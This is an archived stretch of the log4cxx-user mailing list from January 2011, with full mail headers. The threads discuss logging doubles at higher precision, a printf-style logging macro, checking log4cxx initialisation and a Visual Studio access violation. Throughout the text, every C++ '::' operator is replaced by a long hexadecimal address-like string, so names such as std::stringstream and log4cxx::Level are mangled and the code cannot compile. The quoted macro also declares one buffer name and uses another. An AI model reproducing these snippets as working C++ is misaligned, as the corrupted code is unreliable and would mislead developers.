class=3D"gmail_quote"= style=3D"margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 2= 04); padding-left: 1ex;"> I cannot seem to find an answer to this anywhere.=A0 How can I increase dec= imal precision when logging? =A0 Something like stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecisio= n().=A0 Is there a way to do it from the xml configuration file?<br><br>Tha= nks </blockquote></div><br> --90e6ba6e83b26d24b60499413b39-- From [email protected] Fri Jan 07 13:52:00 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76639 invoked from network); 7 Jan 2011 13:52:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jan 2011 13:52:00 -0000 Received: (qmail 44228 invoked by uid 500); 7 Jan 2011 13:52:00 -0000 Delivered-To: [email protected] Received: (qmail 43997 invoked by uid 500); 7 Jan 2011 13:51:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 43988 invoked by uid 99); 7 Jan 2011 13:51:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 13:51:56 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.am-soft.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 13:51:48 +0000 Envelope-To: [email protected] Received: from tschoening-nb.potsdam.am-soft.de (p54BF124A.dip0.t-ipconnect.de [161.129.204.104]) by mail.am-soft.de (Postfix) with ESMTP id DBD43690 for <[email protected]>; Fri, 7 Jan 2011 14:51:27 +0100 (CET) Date: Fri, 7 Jan 2011 14:51:31 +0100 From: =?iso-8859-1?Q?Thorsten_Sch=F6ning?= <[email protected]> Organization: AM-SoFT IT-Systeme X-Priority: 3 (Normal) Message-ID: <[email protected]> To: [email protected] Subject: Re: double precision In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Guten Tag Matthew Bingham, am Freitag, 7. Januar 2011 um 14:02 schrieben Sie: > I know one way is to use stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream, set its precision, build the > string myself, then pass it into log4cxx. However, I am concerned about > performance and would hate to build the string only for it not to be logg= ed > because it is only a DEBUG log and need atleast INFO to log. Performance should not be an issue if you use a function, class or something and use it directly in the macro. It only gets executed if the level fits. LOG4CXX_DEBUG(logger_, "value is " << buildHighPrecStringForLogging(tmp)); Depends if I understood the following right, of course. ;-) #define LOG4CXX_DEBUG(logger, message) { \ if (LOG4CXX_UNLIKELY(logger->isDebugEnabled())) {\ acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bMessageBuffer oss_; \ logger->forcedLog(acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug(), oss_.str(oss_ <<= message), LOG4CXX_LOCATION); }} #else #define LOG4CXX_DEBUG(logger, message) #endif Mit freundlichen Gr=FC=DFen, Thorsten Sch=F6ning --=20 Thorsten Sch=F6ning AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig =20 Telefon: Potsdam: 0331-743881-0 E-Mail: [email protected] Web: http://www.am-soft.de AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow From [email protected] Fri Jan 07 15:04:32 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13883 invoked from network); 7 Jan 2011 15:04:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jan 2011 15:04:32 -0000 Received: (qmail 36447 invoked by uid 500); 7 Jan 2011 15:04:32 -0000 Delivered-To: [email protected] Received: (qmail 36269 invoked by uid 500); 7 Jan 2011 15:04:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 36261 invoked by uid 99); 7 Jan 2011 15:04:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 15:04:29 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO nl0105mta01.mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 15:04:21 +0000 Received: from nl0105mta01.mail.slb.com (localhost.localdomain [161.129.204.104]) by localhost (Postfix) with SMTP id BE634590458 for <[email protected]>; Fri, 7 Jan 2011 15:03:58 +0000 (GMT) Received: from NL0230MBX01N1.DIR.slb.com (nl0230mbx01n1.dir.slb.com [161.129.204.104]) (using TLSv1 with cipher AES128-SHA (128/128 bits)) (No client certificate requested) by nl0105mta01.mail.slb.com (Postfix) with ESMTPS id A149C59037A for <[email protected]>; Fri, 7 Jan 2011 15:03:58 +0000 (GMT) Received: from NL0230MBX09N2.DIR.slb.com (161.129.204.104) by NL0230MBX01N1.DIR.slb.com (161.129.204.104) with Microsoft SMTP Server (TLS) id 14.0.639.21; Fri, 7 Jan 2011 16:03:59 +0100 Received: from NL0230MBX02N2.DIR.slb.com ([161.129.204.104]) by NL0230MBX09N2.DIR.slb.com ([161.129.204.104]) with mapi; Fri, 7 Jan 2011 16:03:58 +0100 From: Ken Sheldon <[email protected]> To: Log4CXX User <[email protected]> Subject: RE: double precision Thread-Topic: double precision Thread-Index: AQHLq8RMxIbywlEARkWtxwJjPbWkq5PFbgGAgAAt4lA= Date: Fri, 7 Jan 2011 15:03:55 +0000 Message-ID: <[email protected]> References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: Content-Type: multipart/alternative; boundary="_000_C6F322DCEBA8674087294205A267910D217335EDNL0230MBX02N2DI_" MIME-Version: 1.0 --_000_C6F322DCEBA8674087294205A267910D217335EDNL0230MBX02N2DI_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable On one project, we use variadic macros to format log messages. This gives = the functionality of printf. The formatting is performed only if the speci= fic log level is enabled. The formatted message is passed as a char* to log= 4cxx. // Size of the local message format buffer #define __MyAPP_DEBUG_MSG_LEN__ 512 // Log a message #define MyAPP_LOG(_logger,_level, ...) {\ char __myapp_buffer__[__MyAPP_DEBUG_MSG_LEN__]; \ sprintf_s(__myapp_buffer__, __MyAPP_DEBUG_MSG_LEN__, __VA_ARGS__); \ LOG4CXX_LOG(_logger,_level,__adc_buffer__);\ } // Gated Macros #define MyAPP _TRACE(_logger, ...) if (logger->isTraceEnabled()) MyAPP_LOG(= _logger,acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetTrace(), __VA_ARGS__) #define MyAPP _DEBUG(_logger, ...) if (logger->isDebugEnabled()) MyAPP_LOG(= _logger,acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug(), __VA_ARGS__) Etc... Then, in code, we can use formatted log messages: MyAPP_TRACE(logger,"message <%d, %11.5f>", someInteger, dblValue) Printf does not handle STL strings. So, if you want to log the contents of= a string, you'll need to use the c_str() method to get the char*. MyAPP_TRACE(logger,"message <%d, \"%s\">", someInteger, strValue.c_str() ) From: Matthew Bingham [mailto:[email protected]] Sent: Friday, January 07, 2011 7:03 AM To: [email protected] Subject: Re: double precision Sorry for not being more specific. If I use the following code with the lo= g4cxx.xml set to use a FileAppender: DOMConfiguratoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfigure("log4cxx.xml"); logger_ =3D Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger("TestApp"); double tmp =3D 100.12345; LOG4CXX_DEBUG(logger_,"value is "<<tmp); The string in the log file is "DEBUG TestApp- value is 100.123" The value of the variable was 100.12345 but only 100.123 was logged. How c= an I log the extra decimal places? I know one way is to use stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream, set its precision, build the st= ring myself, then pass it into log4cxx. However, I am concerned about perf= ormance and would hate to build the string only for it not to be logged bec= ause it is only a DEBUG log and need atleast INFO to log. On Mon, Jan 3, 2011 at 10:02 PM, Matthew Bingham <[email protected]<mail= to:[email protected]>> wrote: I cannot seem to find an answer to this anywhere. How can I increase decim= al precision when logging? Something like stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecision().= Is there a way to do it from the xml configuration file? Thanks --_000_C6F322DCEBA8674087294205A267910D217335EDNL0230MBX02N2DI_ Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr= osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:= //www.w3.org/TR/REC-html40"><head><meta http-equiv=3DContent-Type content= =3D"text/html; charset=3Dus-ascii"><meta name=3DGenerator content=3D"Micros= oft Word 12 (filtered medium)"><style><!-- /* Font Definitions */ @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;} @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman","serif";} a:link, span.MsoHyperlink {mso-style-priority:99; color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {mso-style-priority:99; color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-reply; font-family:"Calibri","sans-serif"; color:#1F497D;} .MsoChpDefault {mso-style-type:export-only;} @page WordSection1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in;} div.WordSection1 {page:WordSection1;} --></style><!--[if gte mso 9]><xml> <o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" /> </xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext=3D"edit"> <o:idmap v:ext=3D"edit" data=3D"1" /> </o:shapelayout></xml><![endif]--></head><body lang=3DEN-US link=3Dblue vli= nk=3Dpurple><div class=3DWordSection1><p class=3DMsoNormal><span style=3D'f= ont-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>On one pr= oject, we use variadic macros to format log messages.&nbsp; This gives the = functionality of printf.&nbsp; The formatting is performed only if the spec= ific log level is enabled. The formatted message is passed as a char* to lo= g4cxx.<o:p></o:p></span></p><p class=3DMsoNormal><span style=3D'font-size:1= 1.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p>&nbsp;</o:p></= span></p><p class=3DMsoNormal style=3D'text-autospace:none'><span style=3D'= font-size:10.0pt;font-family:"Courier New";color:blue'>// Size of the local= message format buffer<o:p></o:p></span></p><p class=3DMsoNormal style=3D't= ext-autospace:none'><span style=3D'font-size:10.0pt;font-family:"Courier Ne= w";color:blue'>#define</span><span style=3D'font-size:10.0pt;font-family:"C= ourier New"'> __MyAPP_DEBUG_MSG_LEN__ 512<o:p></o:p></span></p><p class=3DM= soNormal style=3D'text-autospace:none'><span style=3D'font-size:10.0pt;font= -family:"Courier New"'><o:p>&nbsp;</o:p></span></p><p class=3DMsoNormal sty= le=3D'text-autospace:none'><span style=3D'font-size:10.0pt;font-family:"Cou= rier New";color:blue'>// Log a message <o:p></o:p></span></p><p class=3DMso= Normal style=3D'text-autospace:none'><span style=3D'font-size:10.0pt;font-f= amily:"Courier New";color:blue'>#define</span><span style=3D'font-size:10.0= pt;font-family:"Courier New"'> MyAPP_LOG(_logger,_level, ...) {\<o:p></o:p>= </span></p><p class=3DMsoNormal style=3D'text-autospace:none'><span style= =3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp; <span st= yle=3D'color:blue'>char</span> __myapp_buffer__[__MyAPP_DEBUG_MSG_LEN__]; \= <o:p></o:p></span></p><p class=3DMsoNormal style=3D'text-autospace:none'><s= pan style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp;= sprintf_s(__myapp_buffer__, __MyAPP_DEBUG_MSG_LEN__, __VA_ARGS__); \<o:p><= /o:p></span></p><p class=3DMsoNormal style=3D'text-autospace:none'><span st= yle=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp; LOG4C= XX_LOG(_logger,_level,__adc_buffer__);\<o:p></o:p></span></p><p class=3DMso= Normal style=3D'text-autospace:none'><span style=3D'font-size:10.0pt;font-f= amily:"Courier New"'>&nbsp;&nbsp;&nbsp; }<o:p></o:p></span></p><p class=3DM= soNormal style=3D'text-autospace:none'><span style=3D'font-size:10.0pt;font= -family:"Courier New"'><o:p>&nbsp;</o:p></span></p><p class=3DMsoNormal><sp= an style=3D'font-size:10.0pt;font-family:"Courier New";color:blue'>// Gated= Macros<o:p></o:p></span></p><p class=3DMsoNormal><span style=3D'font-size:= 10.0pt;font-family:"Courier New";color:blue'>#define</span><span style=3D'f= ont-size:10.0pt;font-family:"Courier New"'> MyAPP _TRACE(_logger, ...) <spa= n style=3D'color:blue'>if</span> (logger-&gt;isTraceEnabled()) MyAPP_LOG(_l= ogger,acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetTrace(), __VA_ARGS__)</span><span style=3D'font-= size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p></o:p></= span></p><p class=3DMsoNormal><span style=3D'font-size:10.0pt;font-family:"= Courier New";color:blue'>#define</span><span style=3D'font-size:10.0pt;font= -family:"Courier New"'> MyAPP _DEBUG(_logger, ...) <span style=3D'color:blu= e'>if</span> (logger-&gt;isDebugEnabled()) MyAPP_LOG(_logger,acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLev= elacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug(), __VA_ARGS__)<o:p></o:p></span></p><p class=3DMsoNormal><spa= n style=3D'font-size:10.0pt;font-family:"Courier New"'><o:p>&nbsp;</o:p></s= pan></p><p class=3DMsoNormal><span style=3D'font-size:10.0pt;font-family:"C= ourier New"'>Etc&#8230;<o:p></o:p></span></p><p class=3DMsoNormal><span sty= le=3D'font-size:10.0pt;font-family:"Courier New"'><o:p>&nbsp;</o:p></span><= /p><p class=3DMsoNormal><span style=3D'font-size:10.0pt;font-family:"Courie= r New"'>Then, in code, we can use formatted log messages:<o:p></o:p></span>= </p><p class=3DMsoNormal><span style=3D'font-size:10.0pt;font-family:"Couri= er New"'><o:p>&nbsp;</o:p></span></p><p class=3DMsoNormal><span style=3D'fo= nt-size:10.0pt;font-family:"Courier New"'>MyAPP_TRACE(logger,<span style=3D= 'color:#A31515'>&quot;message &lt;%d, %11.5f&gt;&quot;</span>, someInteger,= dblValue)<o:p></o:p></span></p><p class=3DMsoNormal><span style=3D'font-si= ze:10.0pt;font-family:"Courier New"'><o:p>&nbsp;</o:p></span></p><p class= =3DMsoNormal><span style=3D'font-size:11.0pt;font-family:"Calibri","sans-se= rif";color:#1F497D'>Printf does not handle STL strings.&nbsp; So, if you wa= nt to log the contents of a string, you&#8217;ll need to use the c_str() me= thod to get the char*.<o:p></o:p></span></p><p class=3DMsoNormal><span styl= e=3D'font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:= p>&nbsp;</o:p></span></p><p class=3DMsoNormal><span style=3D'font-size:10.0= pt;font-family:"Courier New"'>MyAPP_TRACE(logger,<span style=3D'color:#A315= 15'>&quot;message &lt;%d, \&quot;%s\&quot;&gt;&quot;</span>, someInteger, s= trValue.c_str() )<o:p></o:p></span></p><p class=3DMsoNormal><span style=3D'= font-size:10.0pt;font-family:"Courier New"'><o:p>&nbsp;</o:p></span></p><p = class=3DMsoNormal><span style=3D'font-size:11.0pt;font-family:"Calibri","sa= ns-serif";color:#1F497D'><o:p>&nbsp;</o:p></span></p><div style=3D'border:n= one;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in'><p class=3DMs= oNormal><b><span style=3D'font-size:10.0pt;font-family:"Tahoma","sans-serif= "'>From:</span></b><span style=3D'font-size:10.0pt;font-family:"Tahoma","sa= ns-serif"'> Matthew Bingham [mailto:[email protected]] <br><b>Sent:</b> = Friday, January 07, 2011 7:03 AM<br><b>To:</b> [email protected].= org<br><b>Subject:</b> Re: double precision<o:p></o:p></span></p></div><p c= lass=3DMsoNormal><o:p>&nbsp;</o:p></p><p class=3DMsoNormal style=3D'margin-= bottom:12.0pt'>Sorry for not being more specific.&nbsp; If I use the follow= ing code with the log4cxx.xml set to use a FileAppender:<br><br>DOMConfigur= atoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfigure(&quot;log4cxx.xml&quot;);<br>logger_ =3D Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger(= &quot;TestApp&quot;);<br>&nbsp;<br>double tmp =3D 100.12345;<br>LOG4CXX_DEB= UG(logger_,&quot;value is &quot;&lt;&lt;tmp);<br><br>The string in the log = file is <br>&quot;DEBUG TestApp- value is 100.123&quot;<br><br>The value of= the variable was 100.12345 but only 100.123 was logged.&nbsp; How can I lo= g the extra decimal places?<br><br>I know one way is to use stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstre= am, set its precision, build the string myself, then pass it into log4cxx.&= nbsp; However, I am concerned about performance and would hate to build the= string only for it not to be logged because it is only a DEBUG log and nee= d atleast INFO to log.<br><br><o:p></o:p></p><div><p class=3DMsoNormal>On M= on, Jan 3, 2011 at 10:02 PM, Matthew Bingham &lt;<a href=3D"mailto:texbingh= [email protected]">[email protected]</a>&gt; wrote:<o:p></o:p></p><p class=3D= MsoNormal>I cannot seem to find an answer to this anywhere.&nbsp; How can I= increase decimal precision when logging? &nbsp; Something like stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring= streamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecision().&nbsp; Is there a way to do it from the xml configurati= on file?<br><br>Thanks <o:p></o:p></p></div><p class=3DMsoNormal><o:p>&nbsp= ;</o:p></p></div></body></html>= --_000_C6F322DCEBA8674087294205A267910D217335EDNL0230MBX02N2DI_-- From [email protected] Fri Jan 07 16:48:23 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82648 invoked from network); 7 Jan 2011 16:48:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jan 2011 16:48:23 -0000 Received: (qmail 28524 invoked by uid 500); 7 Jan 2011 16:48:22 -0000 Delivered-To: [email protected] Received: (qmail 28375 invoked by uid 500); 7 Jan 2011 16:48:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 28367 invoked by uid 99); 7 Jan 2011 16:48:20 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 16:48:20 +0000 X-ASF-Spam-Status: No, hits=-5.0 required=10.0 tests=RCVD_IN_RP_CERTIFIED,RCVD_IN_RP_SAFE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp-gsi.geckosoftware.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 16:48:13 +0000 Received: from [161.129.204.104] (office-net.geckosoftware.com [161.129.204.104]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (No client certificate requested) by detroit.geckosoftware.com (Postfix) with ESMTPSA id CF71C14A481 for <[email protected]>; Fri, 7 Jan 2011 09:39:40 -0700 (MST) Message-ID: <[email protected]> Date: Fri, 07 Jan 2011 09:47:52 -0700 From: "Jacob L. Anawalt" <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:161.129.204.104) Gecko/20101027 Lightning/1.0b2 Thunderbird/3.1.6 MIME-Version: 1.0 To: Log4CXX User <[email protected]> Subject: Re: double precision References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org On 1/7/2011 6:02 AM, Matthew Bingham wrote: > double tmp = 100.12345; > LOG4CXX_DEBUG(logger_,"value is "<<tmp); > > The value of the variable was 100.12345 but only 100.123 was logged. > How can I log the extra decimal places? > LOG4CXX_DEBUG(logger_,"value is " << stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfixed << stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecision(5) << tmp); Or you could have your own macros that did those steps. > Is there a way to do it from the xml configuration file? > I still think the answer to this part of the question is no, not without coding your own layout handler or something that would then pick up settings from the config file. -- Jacob Anawalt Gecko Software, Inc. [email protected] +1-620-806-9604 From [email protected] Mon Jan 10 15:46:09 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8587 invoked from network); 10 Jan 2011 15:46:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jan 2011 15:46:09 -0000 Received: (qmail 99629 invoked by uid 500); 10 Jan 2011 15:46:09 -0000 Delivered-To: [email protected] Received: (qmail 99430 invoked by uid 500); 10 Jan 2011 15:46:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 99362 invoked by uid 99); 10 Jan 2011 15:46:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 10 Jan 2011 15:46:06 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO oproxy2-pub.bluehost.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 10 Jan 2011 15:46:00 +0000 Received: (qmail 8200 invoked by uid 0); 10 Jan 2011 15:45:39 -0000 Received: from unknown (HELO box307.bluehost.com) (161.129.204.104) by oproxy2.bluehost.com with SMTP; 10 Jan 2011 15:45:39 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=default; d=prager.ws; h=Received:Message-ID:Date:From:User-Agent:MIME-Version:To:Subject:Content-Type:Content-Transfer-Encoding:X-Identified-User; b=PhOT4zlEMLxLZGLYVDJ69Nfrhkj39/qIp2QsKRtJxjNvwsYhf7g0okw8Oa7HNUtxYQJl+njwB+lSCZGZLgNWET8//ktGXD+DfhQdo8DLKJnRsMvCPzwKQxLucDutHkqm; Received: from gw1.mcgraw-hill.com ([161.129.204.104] helo=[161.129.204.104]) by box307.bluehost.com with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1PcJw9-00059u-MD for [email protected]; Mon, 10 Jan 2011 08:45:37 -0700 Message-ID: <[email protected]> Date: Mon, 10 Jan 2011 10:45:35 -0500 From: Bernd Prager <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Lightning/1.0b2 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Initialization check of log4cxx Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Identified-User: {1020:box307.bluehost.com:pragerws:prager.ws} {sentby:smtp auth 161.129.204.104 authed with bernd+prager.ws} Hi, I struggled for a while with error messages of log4cxx not properly initialized. It had eventually something to do with singletons which order of instantiation I could not control. I did find a solution of testing if log4cxx is initialized here: http://marc.info/?l=log4cxx-user&m=124071375229146&w=2 It did what I needed but seems to be an expensive operation though. Is there anything more simple available how I can check if log4cxx is initialized? Thanks, -- Bernd From [email protected] Tue Jan 11 19:37:57 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97334 invoked from network); 11 Jan 2011 19:37:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jan 2011 19:37:57 -0000 Received: (qmail 94764 invoked by uid 500); 11 Jan 2011 19:37:57 -0000 Delivered-To: [email protected] Received: (qmail 94704 invoked by uid 500); 11 Jan 2011 19:37:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 94696 invoked by uid 99); 11 Jan 2011 19:37:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 11 Jan 2011 19:37:56 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.ideorlando.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 11 Jan 2011 19:37:47 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by mail.ideorlando.org (Postfix) with ESMTP id A843D778441 for <[email protected]>; Tue, 11 Jan 2011 14:37:25 -0500 (EST) X-Virus-Scanned: [email protected] Received: from mail.ideorlando.org ([161.129.204.104]) by localhost (ideorlando.org [161.129.204.104]) (amavisd-new, port 10024) with LMTP id LLfy7CQW3zuq for <[email protected]>; Tue, 11 Jan 2011 14:37:24 -0500 (EST) Received: from idegfe8335l (idegfe8335l.ideorlando.org [161.129.204.104]) by mail.ideorlando.org (Postfix) with ESMTP id AA950778197 for <[email protected]>; Tue, 11 Jan 2011 14:37:24 -0500 (EST) From: "Rob Outar" <[email protected]> To: <[email protected]> Subject: IMPLEMENT_LOG4CXX_OBJECT exception Date: Tue, 11 Jan 2011 14:37:24 -0500 Message-ID: <00e101cbb1c6$f8e96f40$eabc4dc0$@org> MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_000_00E2_01CBB19D.10136740" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: Acuxxvix5sPYsdvqSn2xewLuSYNt/g== Content-Language: en-us X-Virus-Checked: Checked by ClamAV on apache.org This is a multi-part message in MIME format. ------=_NextPart_000_00E2_01CBB19D.10136740 Content-Type: multipart/alternative; boundary="----=_NextPart_001_00E3_01CBB19D.10136740" ------=_NextPart_001_00E3_01CBB19D.10136740 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit When trying to implement log4cxx we are having the following problem with the log4cxx.dll built using visual studio 2010: when making the IMPLEMENT_LOG4CXX_OBJECT(OBJECT) call following exception is thrown: 0xC0000005: Access violation reading location 0x007d5000. It looks like it may be related to the log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blassRegistration call. If anyone has any insight to this problem it would be greatly appreciated. Best regards, Rob ------=_NextPart_001_00E3_01CBB19D.10136740 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns:dt=3D"uuid:C2F41010-65B3-11d1-A29F-00AA00C14882" = xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" = xmlns=3D"http://www.w3.org/TR/REC-html40"><head><meta name=3D"Microsoft = Theme 2.00" content=3D"Radial 